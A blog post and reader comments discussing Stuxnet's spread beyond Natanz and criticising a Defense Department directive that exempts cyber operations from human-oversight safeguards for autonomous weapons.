Are Escaped Zoo Animals Autonomous?

Back when David Sanger revealed new details of how StuxNet broke free of Natanz, he used the metaphor of an escaped zoo animal actively unlocking its cage.

In the summer of 2010, shortly after a new variant of the worm had been sent into Natanz, it became clear that the worm, which was never supposed to leave the Natanz machines, had broken free, like a zoo animal that found the keys to the cage. It fell to Mr. Panetta and two other crucial players in Olympic Games — General Cartwright, the vice chairman of the Joint Chiefs of Staff, and Michael J. Morell, the deputy director of the C.I.A. — to break the news to Mr. Obama and Mr. Biden.

An error in the code, they said, had led it to spread to an engineer’s computer when it was hooked up to the centrifuges. When the engineer left Natanz and connected the computer to the Internet, the American- and Israeli-made bug failed to recognize that its environment had changed. It began replicating itself all around the world. [my emphasis]

This zoo animal found the keys to its cage, broke free, spread to an engineer’s computer, failed to recognize its new environment, and then began replicating itself all around the world.

That is, Sanger used the language of a cognizant being, acting as an agent to spread itself. That’s not inapt. After all, viruses do spread themselves (though they don’t actually go seek out keys to do so).

Which is why this detail, noted in Obama’s other pre-Thanksgiving document dump, is so stunning. (h/t Trevor Timm)

The Defense Department does not require developers of computer systems that launch cyber operations to implement the same safeguards required of traditional arms makers to prevent collateral damage.

[snip]

directive, released Nov. 21, mandated that automated and semi-autonomous weaponry — such as guided munitions that independently select targets — must have human machine interfaces and “be designed to allow commanders and operators to exercise appropriate levels of human judgment over the use of force.” The mandate called for “rigorous hardware and software verification and validation” to ensure that engagements could be terminated if not completed in a designated time frame. The goal is to minimize “unintended engagements,” the document states.

The Pentagon is permitting less human control over systems that deploy malware, exploits and mitigation tools, highlighting Defense’s focus on agile responses to computer threats. The document, signed by Deputy Secretary of Defense Ashton Carter, explicitly states that the directive “does not apply to autonomous or semi-autonomous cyberspace systems for cyberspace operations.”

We have already lost control of one our semi-autonomous cyberspace operations. The potential danger from its “escape” could be tremendous.

And yet DOD specifically exempts similar operations in the future? So we can commit the same error again?

image_print
15 replies
  1. tib says:

    It has more to do with feasibility. Computer viruses are necessarily autonomous, in the Natanz case once the virus had arrived at the machine it was designed to corrupt there was no way for it to communicate with some human back in the US, those machines are not connected to the Internet.

  2. Snoopdido says:

    This is off topic, but worth a note. It seems that the US State Department has released under FOIA some documents regarding the Aulaqi killings (father and son) to Judicial Watch.

    The Judical Watch press release is here: http://www.judicialwatch.org/press-room/press-releases/judicial-watch-obtains-records-detailing-assassination-of-u-s-born-terrorist-anwar-al-aulaqi-by-a-u-s-drone/

    If anyone is interested, the set of released documents here are quite interesting: http://www.scribd.com/doc/114624884/Abdulrahman-al-Aulaqi-docs-combined#page=56

    Look at the official US Department of State “Cause of Death” on the “Report of Death an American Citizen Abroad” for Anwar al-Aulaqi’s son Abdulrahman Anwar Al-Aulaqi on page 60 of the documents.

    It states that the formal US understanding regarding the cause of death of Abdulrahman Anwar Al-Aulaqi is “unknown”.

    A strike by a US Hellfire missile produces an “unknown” cause of death?

  3. rg says:

    Perhaps the analogy of the zoo animal “finding” the keys implies that they were found where the zoo-keeper negligently left them. Poor oversight and management; power in the hands of incompetents.

  4. What Constitution says:

    @rg: Yep. And the Indians were to blame for passing around those smallpox-infested blankets, too. That’s what comes to mind, sorry for the incredibly high Politically Incorrect quotient, since we know, just know, that our e-warfare guys would never ever set such things in motion.

  5. What Constitution? says:

    @scribe: Cold War hysteria, that. Nothing for us to worry about now, unless these tactics and ramifications were to fall into the hands of the Republicans….

  6. jerryy says:

    @bmaz: To go a bit further (without mixing in the virus implications), what happens when the AI gets advanced enough that “it” decides that “it” does not want to commit suicide by slamming into targets?

    (The effects caused by these viruses interacting with the advances in tech pose some intriguing ethical quandries — mutations of viruses, directly and indirectly by AI are scenarios no one has really pushed into yet.)

  7. What Constitution? says:

    @jerryy: I thought that rubicon was crossed during the making of the Lord of the Rings CGI battle sequences? They tried to program a set of characters who could reactively choose to respond to “dangers” in the hope that this would help to randomize the massive battle activities so it wouldn’t look so choreographed and uniform — and the first time they fired up the sequence, these “special” characters all assessed the situation and, well, they ran away from the perceived dangers…. Is this just an urban legend?

  8. jerryy says:

    @P J Evans: Yeah, some, but I don’t think even HAL or Skynet went so far as to write a virus to use against the competition. In one of Crichton’s yarns, he had the Soviet computer comspire with the US computer to stop war, but he (Crichton) cheated a lot in his writing.

  9. Rayne says:

    I’ve been out of pocket and offline so I missed this, coming late to the party.

    The “escaped zoo animals” analogy is bullshit. At best it’s form of cover to protect the method of dispersion.

    It didn’t break out, it broke in–the attack’s design inherently relied on this.

    I question Sanger’s role as a journalist here.

    EDIT — 12:15PM 01-DEC-2012 —

    Same article by Sanger points out features that clearly point to an ongoing communication process with the cyberweapon at Natanz. First, the reference to a “beacon” that implanted and then phoned home; second, to the varying nature of the attacks. The code could have generated random numbers in the PLCs, but the code’s “beacon” feature also could have asked for resets of the process, in order to change the attacks and/or to hide the code.

    The developers understood this. The authorizers are either clueless or they are hiding behind teh stupid–again, this may be part of the cover.

    I see nothing to indicate the DoD will refrain from using similar tactics as part of any defense methodology, cyberweapon or otherwise. If anything, I sense DoD concern that the same insertion approach could eff up their own weapons. Exhibit A, the early drones with software that could be remotely hacked.

Comments are closed.